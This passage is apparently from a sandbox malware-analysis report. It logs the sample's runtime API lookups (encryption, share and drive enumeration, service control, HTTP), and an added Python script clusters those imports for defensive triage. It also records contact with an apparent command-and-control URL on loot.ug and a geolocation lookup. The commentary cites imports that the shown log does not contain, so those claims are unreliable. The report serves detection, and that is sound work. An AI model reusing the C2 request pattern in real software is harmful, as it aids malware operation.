Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75e43c71 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x75488bff True 2
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x75486c3c True 1
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x75491341 True 2
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x7549011a True 1
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x754aed56 True 1
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77634100 True 1
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x7548b238 True 1
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x75493e75 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75364f2b True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75361252 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75364208 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7536359f True 2
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77610fcb True 9
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77609d35 True 4
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75365235 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 2
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x753879f9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x7536435f True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75363519 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x75361b00 True 2
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75a2d918 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x759f1ee5 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x759d1635 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x759cf48b True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x750f3058 True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x750f2f06 True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x750f2dd6 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x75d59197 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x75d4b406 True 1
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x75d5f18e True 1
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x750b26e0 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x770345bf True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7705ad1a True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7702d65e True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x770381ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75364435 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75365a4b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7536103d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x7537c807 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x75364259 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75361136 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x75365371 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75361986 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x7536492b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x7538830d True 1
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x75364620 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x7538d556 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x75361072 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75363ed3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75363f5c True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75382b7a True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75365929 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x7538594d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x753659e2 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75379af0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75388baf True 1
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x7536168c True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x7536183e True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7538896c True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7538828e True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x75364c6b True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x753689b3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x75362d3c True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75383102 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x75365444 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75382a9d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x7537cf28 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x7537174d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x75365558 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x75364467 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x753634d5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x7538d526 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x7536495d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x753834d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x7537f481 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x753614e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x753654ee True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x7536dd0e True 1
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x75488a29 True 1
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x75489a55 True 1
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x754878e2 True 1
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x75489abb True 1
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x754888f7 True 1
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x75491361 True 1
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x75487809 True 1
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x7548b17d True 1
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x75490dfb True 1
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x75487136 True 1
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x75489679 True 1
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x75493559 True 1
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x776025dd True 1
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x754dfd1e True 1
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x754905ba True 1
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x754dfd3f True 1
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x7548787b True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x76f6369c True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76f6157a True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x76f5df36 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76f614d6 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76f6469d True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x76f77144 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x76f5ca4c True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x76f5df4e True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76f7779b True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76f5c532 True 1
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76f646ad True 1
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76077078 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x75beb636 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x75c186d3 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75c19d0b True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x76b53eae True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x76b53ed5 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x76b55dee True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x76b54af8 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x76b53e59 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x76b53f21 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x76b54642 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x76b5fd6b True 1
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x75099263 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x76b1311b True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x76b27673 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x76b1b131 True 1
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x7503436b True 1
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x7504572c True 1
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x74f8c544 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x753e410b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x753e46b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x753f6676 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x753e47f1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x7537eee0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75461544 True 1
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75461408 True 1
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x75eb5708 True 44
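The Get Address list above is the most useful triage input on this page: it records every export the sample resolved at run time through GetProcAddress, including a handful requested by ordinal (oleaut32.dll, ws2_32.dll), a few that failed on this OS build (address_out = 0x0 False, after which the same names are fetched from psapi.dll), and several kernel32/user32 names such as HeapAlloc, EncodePointer and DefWindowProcW whose resolved address lies well outside the 0x7536xxxx/0x754xxxxx ranges of their own module, which is what an export forwarded into ntdll looks like. The script below is an added example for this page, not VMRay's code and not the sample's: it parses the report's own line format, groups the names into capability clusters (the clusters and the ordinal-to-name hints are my own, not a VMRay VTI category), lists the failed lookups, and flags suspected forwarders by distance from each module's median address. The sample input is a subset of lines copied from the report above.

```python
"""Capability triage over the "Get Address" (GetProcAddress) lines of a VMRay report.

Added example; neither VMRay's code nor code from the analysed sample.
"""
import re
import statistics
from collections import defaultdict

# One report line:
#   Get Address <path> function = <name|ordinal>, address_out = <hex> <True|False> <count>
LINE_RE = re.compile(
    r"^Get Address\s+(?P<path>\S+)\s+function = (?P<func>[^,]+), "
    r"address_out = (?P<addr>0x[0-9a-fA-F]+)\s+(?P<ok>True|False)\s+(?P<count>\d+)$"
)

# Ordinal-to-name hints for the two modules the sample imports by ordinal
# (assumption: taken from the public export tables of ws2_32.dll / oleaut32.dll).
ORDINAL_HINTS = {
    "ws2_32.dll": {"11": "inet_addr", "12": "inet_ntoa", "52": "gethostbyname"},
    "oleaut32.dll": {"2": "SysAllocString", "6": "SysFreeString", "8": "VariantInit",
                     "9": "VariantClear", "12": "VariantChangeType", "200": "GetErrorInfo",
                     "201": "SetErrorInfo", "202": "CreateErrorInfo"},
}

# Capability clusters used for triage (assumption: my own grouping).
CAPABILITIES = {
    "crypto (CryptoAPI)": {"CryptAcquireContextW", "CryptCreateHash", "CryptHashData",
                           "CryptGetHashParam", "CryptDestroyHash", "CryptImportKey",
                           "CryptEncrypt", "CryptReleaseContext", "CryptStringToBinaryA"},
    "network share enumeration": {"WNetOpenEnumW", "WNetEnumResourceW", "WNetCloseEnum"},
    "drive and file discovery": {"GetLogicalDrives", "GetDriveTypeA", "FindFirstFileW",
                                 "FindNextFileW"},
    "process enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
                            "Module32FirstW", "EnumProcesses", "EnumProcessModules",
                            "GetModuleBaseNameW", "OpenProcess"},
    "service control": {"OpenSCManagerW", "OpenServiceW", "ControlService", "QueryServiceStatus"},
    "HTTP (WinINet)": {"InternetOpenW", "InternetOpenA", "InternetOpenUrlW", "InternetOpenUrlA",
                       "InternetReadFile", "HttpQueryInfoW"},
    "host identity": {"DnsQuery_W", "gethostbyname", "GetAdaptersInfo", "GetComputerNameW",
                      "GetUserNameW", "UuidCreate"},
    "registry write": {"RegSetValueExW"},
    "execution and file manipulation": {"CreateProcessW", "CreateProcessA", "ShellExecuteW",
                                        "ShellExecuteExW", "ShellExecuteA", "CopyFileW",
                                        "MoveFileW", "DeleteFileW", "DeleteFileA",
                                        "CreateSymbolicLinkW"},
    "single instance / debugger check": {"CreateMutexA", "IsDebuggerPresent"},
}


def parse(lines):
    """Parse Get Address lines into dicts; lines of any other shape are skipped."""
    out = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        module = m["path"].rsplit("\\", 1)[-1].lower()      # kernel32.dll, psapi.dll, ...
        func = m["func"].strip()                             # export name or ordinal ("52")
        out.append({"module": module, "func": func,
                    "name": ORDINAL_HINTS.get(module, {}).get(func, func),
                    "addr": int(m["addr"], 16), "ok": m["ok"] == "True",
                    "count": int(m["count"])})
    return out


def triage(lines, forwarder_distance=0x200000):
    """Cluster resolved imports, list failed lookups and suspected forwarded exports."""
    caps, by_module, unresolved = defaultdict(set), defaultdict(list), []
    for e in parse(lines):
        if not e["ok"]:
            unresolved.append(f"{e['module']}!{e['func']}")
            continue
        by_module[e["module"]].append(e)
        for cap, names in CAPABILITIES.items():
            if e["name"] in names:
                caps[cap].add(e["name"])
    # Heuristic: a DLL's own exports resolve inside its image, so an address far from
    # the module's median is most likely a forwarder into another DLL (ntdll here).
    forwarders = []
    for module, entries in by_module.items():
        median = statistics.median(e["addr"] for e in entries)
        forwarders += [(module, e["name"], e["addr"]) for e in entries
                       if abs(e["addr"] - median) > forwarder_distance]
    return {"capabilities": {c: sorted(n) for c, n in sorted(caps.items())},
            "unresolved": sorted(unresolved), "suspected_forwarders": sorted(forwarders)}


# Sample input: a subset of lines copied from the report above.
SAMPLE_LOG = r"""
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x775fe026 True 2
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75364a5d True 2
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 2
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75388baf True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7538896c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x75365371 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x75364c6b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7536103d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75461544 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76f5c532 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76f7779b True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76f614d6 True 1
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x750f2f06 True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x750f3058 True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x750f2dd6 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x7504572c True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x76b27673 True 1
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x776025dd True 1
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x75488a29 True 1
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x754dfd3f True 1
"""

if __name__ == "__main__":
    result = triage(SAMPLE_LOG.splitlines())
    for cap, names in result["capabilities"].items():
        print(f"{cap}: {', '.join(names)}")
    print("unresolved:", result["unresolved"])
    print("suspected forwarders:", result["suspected_forwarders"])
```

Run against the full list on this page, the clusters that matter for the classification in the report header are CryptoAPI (CryptImportKey and CryptEncrypt next to the hash functions), WNet share enumeration, drive and file discovery, service control, and the WinINet/DNS set; the GDI, OLE and window-message imports are the noise a GUI-framework template pulls in. The forwarder heuristic is a distance test, not a lookup of the export table, so treat its hits as a prompt to check the export directory with a PE tool rather than as a finding.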
User (1)
Operation Additional Information Success Count
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Window (1)
Operation Window Name Additional Information Success Count
Create LPCWSTRszTitle class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
System (418)
Operation Additional Information Success Count
Sleep duration = 1 milliseconds (0.001 seconds) True 161
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Get Time type = System Time, time = 2019-03-24 05:38:48 (UTC) True 1
Get Time type = Ticks, time = 84412 True 1
Get Time type = Performance Ctr, time = 12804540292 True 1
Get Time type = System Time, time = 2019-03-24 05:38:51 (UTC) True 1
Get Time type = Performance Ctr, time = 13229078529 True 1
Get Info type = Hardware Information True 249
Get Info type = Operating System True 1
Mutex (1)
Operation Additional Information Success Count
Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Environment (2)
Operation Additional Information Success Count
Get Environment String - True 2
Network Behavior
HTTP Sessions (2)
Information Value
Total Data Sent 636 bytes
Total Data Received 7.60 KB
Contacted Host Count 2
Contacted Hosts 77.123.139.189, 95.213.139.118
HTTP Session #1
Information Value
User Agent Microsoft Internet Explorer
Server Name loot.ug
Server Port 80
Username -
Password -
Data Sent 169 bytes
Data Received 285 bytes
Operation Additional Information Success Count
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = http, server_name = loot.ug, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://loot.ug/Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php?pid=AE2BD2A0D8075FA76A58D68C2A4634E3 True 1
Read Response size = 1024, size_out = 103 True 1
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Close Session - True 1
HTTP Session #2
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.32 KB
Operation Additional Information Success Count
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Read Response size = 10240, size_out = 554 True 1
Close Session - True 1
